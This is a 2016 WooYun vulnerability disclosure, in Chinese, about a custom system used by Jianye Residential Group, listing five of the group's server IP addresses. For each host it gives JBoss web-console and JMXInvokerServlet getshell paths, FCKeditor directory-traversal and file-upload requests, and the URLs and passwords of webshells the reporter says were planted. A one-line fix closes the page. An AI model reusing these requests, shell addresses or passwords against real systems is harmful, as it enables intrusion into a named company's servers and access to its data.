当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171509

漏洞标题:建业住宅集团某定制系统通用型漏洞打包

相关厂商:建业住宅集团(中国)有限公司

漏洞作者: 路人甲

提交时间:2016-01-21 15:33

修复时间:2016-03-05 09:52

公开时间:2016-03-05 09:52

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-03-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

通用型漏洞打包(配置不当getshell、命令执行getshell、文件上传getshell、目录遍历)

详细说明:

http://218.28.132.194/建业集团
http://61.163.95.187/建业控股
http://218.28.3.86/建业物业
http://218.29.103.146/建业泰宏
http://61.163.86.141:8080/建业集团
等等
该套定制系统使用了jboss作为中间件,然而遗憾的配置不当
http://218.28.132.194/web-console

QQ截图20160120221649.png


直接shell

QQ截图20160120222134.png


命令马http://218.28.132.194/jbossass/jbossass.jsp
http://61.163.95.187/web-console

QQ截图20160120221446.png


QQ截图20160120222317.png


http://61.163.95.187/jbossass/jbossass.jsp
http://218.28.3.86/web-console

QQ截图20160120221518.png


QQ截图20160120222428.png


http://218.28.3.86/jbossass/jbossass.jsp
http://218.29.103.146/web-console/

QQ截图20160120221743.png


QQ截图20160120222520.png


http://218.29.103.146/jbossass/jbossass.jsp
http://61.163.86.141:8080/web-console/

QQ截图20160120221839.png


QQ截图20160120222624.png


http://61.163.86.141:8080/jbossass/jbossass.jsp

漏洞证明:

同时也存在java反序列化命令执行
http://218.28.132.194/invoker/JMXInvokerServlet

QQ截图20160120222724.png


http://61.163.95.187/invoker/JMXInvokerServlet

QQ截图20160120222744.png


http://218.28.3.86/invoker/JMXInvokerServlet

QQ截图20160120222804.png


http://218.29.103.146/invoker/JMXInvokerServlet

QQ截图20160120222824.png


http://61.163.86.141:8080/invoker/JMXInvokerServlet

QQ截图20160120222841.png


该套系统同时还使用了fck作为编辑器,仍然配置不当
http://218.28.132.194/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../

QQ截图20160120223024.png


http://61.163.95.187/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../

QQ截图20160120223052.png


因为都是同一套程序,所以路径什么都差不多
http://218.28.3.86/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../

QQ截图20160120223124.png


http://218.29.103.146/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../

QQ截图20160120223143.png


http://61.163.86.141:8080/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../

QQ截图20160120223203.png


有遍历当然有上传
http://218.28.132.194/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://218.28.132.194/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector

QQ截图20160120223416.png


可直接上传jspshell,jsp会跳转到登录页,所以我们传jspx
地址:http://218.28.132.194/UserFiles/File/index.jspx
密码:7788wpp

QQ截图20160120223709.png


http://61.163.95.187/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://61.163.95.187/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector

QQ截图20160120223915.png


http://61.163.95.187/UserFiles/File/index.jspx
密码:023

QQ截图20160120223943.png


http://218.28.3.86/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://218.28.3.86/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector

QQ截图20160120224037.png


http://218.28.3.86/UserFiles/File/index.jspx
密码:023

QQ截图20160120224112.png


http://218.29.103.146/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://218.29.103.146/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector

QQ截图20160120224156.png


http://218.29.103.146/UserFiles/File/index.jspx
密码:023

QQ截图20160120224224.png


http://61.163.86.141:8080/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://61.163.86.141:8080/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector

QQ截图20160120224312.png


http://61.163.86.141:8080/UserFiles/File/index.jspx
密码:023

QQ截图20160120224340.png

修复方案:

正确配置fck,正确配置jboss,删除shell

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝